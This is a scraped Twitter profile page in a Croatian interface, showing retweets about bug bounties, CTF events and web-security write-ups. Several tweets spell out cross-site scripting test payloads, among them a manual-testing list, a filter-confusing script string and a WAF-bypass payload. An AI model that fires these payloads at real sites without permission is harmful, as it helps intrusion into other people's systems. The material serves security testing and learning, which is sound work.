Tweetovi

Blokirali ste korisnika/cu @aaaaa8716617

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @aaaaa8716617

  1. proslijedio/la je Tweet
    11. sij

    Follow this step-by-step guide to properly test for … Like a ! by

    Poništi
  2. proslijedio/la je Tweet
    17. lis 2018.
    Poništi
  3. proslijedio/la je Tweet
    18. sij

    dom xss Exercise your muscles and pop an alert box on these 3 main DOM-based reflected cases! by

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    12. lip 2019.

    Here's a small list for manual testing (main cases, high success rate). "><img src onerror=alert(1)> "autofocus onfocus=alert(1)// </script><script>alert(1)</script> '-alert(1)-' \'-alert(1)// javascript:alert(1) Try it on: - URL query, fragment & path; - all input fields.

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    25. sij

    Yay, I was awarded a $500 bounty on ! for Stored XSS

    Poništi
  6. proslijedio/la je Tweet
    26. sij

    Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    22. sij

    What is the best way to scare off black hat hackers? 🎩😱

    Poništi
  8. proslijedio/la je Tweet
    26. sij

    For enumerating subdomains I always use 's Spyse API wrapper. It's so f'in good!

    Poništi
  9. proslijedio/la je Tweet
    26. sij

    Stanford having a blast at Quals! Much appreciation to Black, White, Orange, and Red Teams for the ❤️and many hours they commit. Good luck to all the talented teams in the West! Grateful for support from .

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    24. sij

    Write-ups Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty The Bug That Exposed Your PayPal Password Yahoo — Two XSSi vulnerabilities ,

    Poništi
  11. proslijedio/la je Tweet
    27. sij

    $40,000 Bugs Microsoft Edge (Chromium) - EoP via XSS to Potential RCE Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty ,

    Poništi
  12. proslijedio/la je Tweet
    23. sij

    A filter-confusing one by , inspired from <script> x = '<!--<script>'/*</script>-->*/;alert(1) </script

    Poništi
  13. proslijedio/la je Tweet
    23. sij

    I once got 90% of a critical vulnerability in Mozilla Persona's password reset. 8 years later, it still hurts that I didn't complete it. Has anyone ever successfully exploited SMTP injection via the Reply-To+Eicar technique or similar non-CC methods?

    Poništi
  14. proslijedio/la je Tweet
    Odgovor korisniku/ci
    Poništi
  15. proslijedio/la je Tweet
    20. lip 2018.
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    1. kol 2019.

    See our introductory post about Doctrine Query Language injections:

    Poništi
  17. proslijedio/la je Tweet
    18. pro 2019.

    And again Account TakeOver. That's the fourth time. And the second one on the same site. ЫЫ

    Poništi
  18. proslijedio/la je Tweet
    8. pro 2019.

    A WAF bypass payload by <img src=something onauxclick="new Function `al\ert\`xss\``">

    Poništi
  19. proslijedio/la je Tweet
    9. pro 2019.

    Please check this screenshot. Are you checking there (after #)? 😎

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·